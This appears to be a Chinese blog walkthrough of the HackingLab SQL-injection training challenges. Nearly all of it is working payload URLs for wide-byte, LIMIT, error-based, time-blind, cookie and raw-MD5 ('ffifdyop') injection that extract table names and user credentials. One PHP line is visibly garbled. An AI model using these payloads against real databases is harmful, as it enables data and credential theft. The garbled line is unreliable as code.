HackingLab 注入关

防注入—宽字节注入

#爆数据库
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=-1%df' union select 1,2,database()%23

#爆表名
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x6D79646273%23

#爆列名
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7361655F757365725F73716C6934%23

#爆数据
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=-1%df' union select 1,group_concat(title_1),group_concat(content_1) from sae_user_sqli4 %23

到底能不能回显—limit注入

#数据库
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,database())),1)%23&num=1

#表名
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select distinct concat(0x3f,table_name,0x3f) from information_schema.tables where table_schema=0x6d79646273 limit 0,1))),1)#&num=1

#列名
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select distinct concat(0x3f,column_name,0x3f) from information_schema.columns where table_name=0x75736572 limit 2,1))),1)%23&num=1

#数据
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0 procedure analyse(extractvalue(rand(),concat(0x3a,(select distinct concat(0x3f,username,0x3a,password,0x3f) from user limit 2,1))),1)%23&num=1

ErrorBased—报错注入

#数据库
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and extractvalue(1,concat(0x7e,database(),0x7e))%23

#表
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x6D79646273),0x7e))%23

#列
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=0x6D6F74746F),0x7e))%23

#数据
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and extractvalue(rand(),concat(0x7e,(select concat(motto) from motto limit 3,1),0x7e))%23  

盲注—延时盲注

#数据库
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(ascII(substr(database(),2,1))=121,1,sleep(5))%23

SQL注入通用防护—Cookie注入

Cookie: PHPSESSID=302e9cf079feae64eca5eb1af7937602;id=1 order by 3
#数据库
Cookie: PHPSESSID=302e9cf079feae64eca5eb1af7937602;id=1 union select 1,2,database()

据说哈希后的密码是不能产生注入的—MD5加密注入

s t r s q l = " s e l e c t ∗ f r o m ‘ u s e r ‘ w h e r e u s e r i d = " . i n t v a l ( strsql="select * from `user` where userid=".intval( strsql="selectfromuserwhereuserid=".intval(_GET[‘userid’])." and password=’".md5($_GET[‘pwd’], true) ."’";

userid转换为数字,pwd MD5加密
md5()函数第二个参数为true时,会返回16字符的二进制格式。当为false的时候,返回的就是32字符十六进制数。默认的是false模式。

md5('123')         //202cb962ac59075b964b07152d234b70
md5('123',true)    // ,�b�Y[�K-#Kp

需要一个字符串:(ffifdyop) MD5之后转成字符串有 ‘or’ 字样,变成
select * from user where userid=“1"and password =”'or’6"

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值